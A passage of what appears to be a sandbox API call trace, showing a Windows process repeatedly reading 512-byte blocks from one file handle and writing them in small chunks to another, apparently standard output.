lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.010] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.010] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.010] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.010] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.011] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.011] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] GetFileType (hFile=0x50) returned 0x1 [0233.011] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.011] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] GetFileType (hFile=0x50) returned 0x1 [0233.012] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.012] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.013] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.013] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.013] GetFileType (hFile=0x50) returned 0x1 [0233.013] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.014] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.014] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.016] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.016] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.017] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.017] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.018] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.018] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.020] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.020] ReadFile (in: 